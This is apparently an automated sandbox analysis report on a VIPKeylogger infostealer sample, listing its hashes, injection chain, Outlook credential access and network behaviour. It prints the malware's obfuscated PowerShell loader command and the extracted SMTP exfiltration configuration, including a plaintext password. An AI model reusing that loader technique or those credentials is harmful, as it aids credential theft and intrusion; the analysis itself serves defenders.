Analysis
- max time kernel: 144s
- max time network: 148s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 10-12-2024 15:26
Static task: static1
Behavioral task: behavioral1
- Sample: ST07933.exe
- Resource: win7-20240903-en
Behavioral task: behavioral2
- Sample: ST07933.exe
- Resource: win10v2004-20241007-en
General
- Target: ST07933.exe
- Size: 820KB
- MD5: d9c24eb3137fb3e1f939625d3076bb0f
- SHA1: 9d06b465b4e137dccc09aa583fd928bbcf2275aa
- SHA256: 02184b32f1b3e76b78acf7e889f3f581ef65696df1f64efb9bfe3b2d2ccabfd6
- SHA512: f1d6e69a72deb762416c0954faa05196debc9b6b53ab9a38621dbeb0175dd907ce4758b0aea6f78501b5b9a6c8307c50a10fe7c6e4af72415c9a573d08baf057
- SSDEEP: 24576:wTkQIwLXEADfmo/SbKdsyjlR4MsfZV+ER/r:qvTDf6bKdsalRpsfZV+q/r
Malware Config
Extracted: vipkeylogger
- Protocol: smtp
- Host: smtp.ionos.es
- Port: 587
- Username: [email protected]
- Password: JA-*2020antonio
- Email To: [email protected]
Signatures
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.
Vipkeylogger family
Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
- Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (msiexec.exe)
- Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (msiexec.exe)
- Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (msiexec.exe)
Blocklisted process makes network request (8 IoCs)
- Flows 36, 38, 40, 42, 44, 49, 51, 55: PID 4288 msiexec.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
- Flow 35: drive.google.com
- Flow 36: drive.google.com
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
- Flow 48: checkip.dyndns.org
Drops file in System32 directory (1 IoC)
- File opened for modification C:\Windows\SysWOW64\telectrograph\assimilationer.Qua (ST07933.exe)
Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
- PID 4288 msiexec.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
- PID 3200 powershell.exe
- PID 4288 msiexec.exe
Drops file in Program Files directory (1 IoC)
- File opened for modification C:\Program Files (x86)\Common Files\intercepter.mos (ST07933.exe)
Command and Scripting Interpreter: PowerShell
- PID 3200 powershell.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (msiexec.exe)
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (ST07933.exe)
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
Suspicious behavior: EnumeratesProcesses (9 IoCs)
- PID 3200 powershell.exe (7 entries)
- PID 4288 msiexec.exe (2 entries)
Suspicious behavior: MapViewOfSection (1 IoC)
- PID 3200 powershell.exe
Suspicious use of AdjustPrivilegeToken (23 IoCs)
- PID 3200 powershell.exe, tokens in order: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- PID 4288 msiexec.exe: SeDebugPrivilege
Suspicious use of WriteProcessMemory (7 IoCs)
- PID 1212 (ST07933.exe) wrote to memory of PID 3200, procid_target 86 (3 entries)
- PID 3200 (powershell.exe) wrote to memory of PID 4288, procid_target 93 (4 entries)
outlook_office_path (1 IoC)
- Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (msiexec.exe)
outlook_win_path (1 IoC)
- Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (msiexec.exe)
Processes
- C:\Users\Admin\AppData\Local\Temp\ST07933.exe (PID 1212)
  Command line: "C:\Users\Admin\AppData\Local\Temp\ST07933.exe"
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3200)
    Command line: "powershell.exe" -windowstyle minimized "$Dudleyite119=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\depersonaliseredes\Faldgruberne\Proterandrous.Dis';$Interlaminating=$Dudleyite119.SubString(7465,3);.$Interlaminating($Dudleyite119)"
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\msiexec.exe (PID 4288)
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      - Accesses Microsoft Outlook profiles
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path
Network
MITRE ATT&CK Enterprise v15
Downloads